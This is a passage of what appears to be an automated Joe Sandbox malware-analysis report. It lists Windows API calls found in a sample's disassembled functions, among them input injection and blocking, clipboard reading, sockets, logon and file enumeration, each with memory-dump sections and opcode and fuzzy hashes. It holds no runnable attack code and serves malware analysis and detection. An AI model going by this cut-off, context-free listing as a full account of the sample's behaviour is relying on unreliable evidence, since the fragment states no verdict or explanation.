                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardMessagePostState$InputSend
                                                                        • String ID:
                                                                        • API String ID: 3031425849-0
                                                                        • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                        • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                        • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                        • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                        APIs
                                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 0047666F
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 4170576061-0
                                                                        • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                        • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                        • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                        • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                        APIs
                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                        • IsWindowVisible.USER32 ref: 0047A368
                                                                        • IsWindowEnabled.USER32 ref: 0047A378
                                                                        • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                        • IsIconic.USER32 ref: 0047A393
                                                                        • IsZoomed.USER32 ref: 0047A3A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                        • String ID:
                                                                        • API String ID: 292994002-0
                                                                        • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                        • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                        • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                        • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                        APIs
                                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                        • CoInitialize.OLE32(00000000), ref: 00478442
                                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                        • CoUninitialize.OLE32 ref: 0047863C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                        • String ID: .lnk
                                                                        • API String ID: 886957087-24824748
                                                                        • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                        • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                        • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                        • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                        APIs
                                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                        • String ID:
                                                                        • API String ID: 15083398-0
                                                                        • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                        • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                        • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                        • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: U$\
                                                                        • API String ID: 4104443479-100911408
                                                                        • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                        • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                        • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                        • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 3541575487-0
                                                                        • Opcode ID: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                                                                        • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                        • Opcode Fuzzy Hash: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                                                                        • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                        APIs
                                                                        • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                        • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                        • String ID:
                                                                        • API String ID: 48322524-0
                                                                        • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                        • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                        • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                        • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                        APIs
                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                        • String ID:
                                                                        • API String ID: 901099227-0
                                                                        • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                        • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                        • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                        • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                        APIs
                                                                        • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Proc
                                                                        • String ID:
                                                                        • API String ID: 2346855178-0
                                                                        • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                        • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                        • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                        • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                        APIs
                                                                        • BlockInput.USER32(00000001), ref: 0045A38B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: BlockInput
                                                                        • String ID:
                                                                        • API String ID: 3456056419-0
                                                                        • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                        • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                        • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                        • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                        APIs
                                                                        • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: LogonUser
                                                                        • String ID:
                                                                        • API String ID: 1244722697-0
                                                                        • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                        • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                        • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                        • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                        APIs
                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                        • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                        • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                        • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                        • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                        • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                        • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: N@
                                                                        • API String ID: 0-1509896676
                                                                        • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                        • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                        • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                        • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                        • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                        • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                        • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                        Memory Dump Source
